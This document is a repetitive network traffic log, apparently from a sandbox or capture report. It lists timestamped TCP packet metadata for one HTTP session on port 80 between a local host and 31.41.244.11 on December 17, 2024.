Dec 17, 2024 06:03:43.316457987 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.316483021 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.316504955 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.316561937 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.317528963 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.317555904 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.317575932 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.317594051 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.318423986 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.318463087 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.318602085 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.318638086 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.319586992 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.319601059 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.319628000 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.319641113 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.320660114 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.320674896 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.320698023 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.320714951 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.321728945 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.321743965 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.321765900 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.321782112 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.322673082 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.322714090 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.322860003 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.322897911 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.323735952 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.323772907 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.323918104 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.323954105 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.324453115 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.324469090 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.324500084 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.325390100 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.325403929 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.325424910 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.325450897 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.328383923 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.328421116 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.328571081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.328607082 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.329303026 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.329317093 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.329332113 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.329340935 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.329345942 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.329359055 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.329385996 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.330130100 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.330171108 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.330305099 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.330342054 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.331355095 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.331381083 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.331392050 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.331410885 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.331707001 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.331743956 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.331856012 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.331893921 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.332801104 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.332815886 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.332837105 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.332853079 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.333770990 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.333806038 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.334803104 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.334816933 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.334836960 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.334852934 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.335371017 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.335407019 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.336029053 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.336044073 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.336066961 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.336082935 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.337054014 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.337069035 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.337089062 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.337105989 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.338105917 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.338120937 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.338143110 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.338157892 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.339195967 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.339210033 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.339231014 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.339246988 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.340246916 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.340260983 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.340282917 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.340300083 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.341295958 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.341310024 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.341331005 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.341346979 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.342385054 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.342398882 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.342422009 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.342436075 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.346191883 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.346206903 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.346220970 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.346236944 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.346261978 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.346353054 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.346366882 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.346381903 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.346395016 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.346472025 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.347140074 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.347177982 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.347270966 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.347306967 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.348287106 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.348326921 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.348496914 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.348532915 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.348639011 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.348675013 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.349689960 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.349704981 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.349729061 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.349742889 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.350706100 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.350720882 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.350747108 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.350763083 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.351361036 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.351398945 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.351864100 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.351902962 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.352179050 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.352215052 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.352929115 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.352942944 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.352974892 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.352984905 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.490349054 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.490489960 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.490664959 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.490746975 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.490802050 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.490835905 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.490878105 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.491873026 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.491976023 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.492019892 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.492866993 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.492913961 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.492954016 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.493002892 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.493915081 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.493961096 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.494077921 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.494123936 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.494971037 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.495014906 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.495071888 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.495115042 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.496155977 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.496172905 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.496212006 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.497205019 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.497220039 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.497267008 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.498276949 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.498292923 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.498337030 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.499206066 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.499264956 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.499327898 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.499366999 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.500303984 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.500423908 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.500469923 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.501323938 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.501368999 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.501466036 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.501508951 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.502418995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.502485991 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.502545118 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.502588987 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.503453016 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.503496885 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.503601074 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.503643990 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.504520893 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.504651070 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.504693985 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.505579948 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.505624056 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.505800009 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.505842924 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.506628036 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.506671906 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.506742001 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.506788015 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.507733107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.507777929 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.507801056 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.507843971 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.508773088 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.508816004 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.508970022 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.509016991 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.509862900 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.509907961 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.509948015 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.509990931 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.510885954 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.510931015 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.510971069 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.511014938 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.511950970 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.512125969 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.512168884 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.513042927 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.513093948 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.513164043 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.513206005 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.514106989 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.514153004 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.514389992 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.514431953 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.515228033 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.515244007 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.515274048 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.515289068 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.516202927 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.516292095 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.516333103 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.517296076 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.517335892 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.517493963 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.517529011 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.518476009 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.518491983 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.518517971 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.518529892 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.519364119 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.519409895 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.519481897 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.519521952 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.520441055 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.520550013 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.520591974 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.524058104 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.524074078 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.524089098 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.524105072 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.524126053 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.524143934 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.524355888 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.524372101 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.524398088 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.524426937 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.525371075 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.525624990 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.525676966 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.526560068 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.526621103 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.526650906 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.526700020 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.527479887 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.527529001 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.527628899 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.527674913 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.528551102 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.528736115 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.528784990 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.529721022 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.529736996 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.529772043 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.529799938 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.530720949 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.530838013 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.530884981 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.531774044 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.531826019 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.531898022 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.532886982 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.532939911 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.533078909 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.533119917 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.533951044 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.533967972 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.533998966 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.534015894 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.535110950 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.535130024 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.535178900 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.536129951 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.536145926 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.536210060 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.536242008 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.537120104 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.537190914 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.537237883 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.538038015 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.538090944 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.538218975 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.538305998 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.539258957 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.539324045 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.539357901 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.539845943 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.540317059 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.540333033 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.540361881 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.540385962 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.541448116 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.541557074 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.541591883 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.541608095 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.542414904 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.542530060 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.542581081 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.543431997 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.543478012 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.543579102 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.543618917 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.544483900 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.544498920 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.544538021 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.545514107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.545552969 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.545696020 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.545734882 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.546606064 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.546659946 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.683151007 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.683249950 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.683326960 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:43.683692932 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.683708906 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:43.683854103 CET	49902	80	192.168.2.5	31.41.244.11
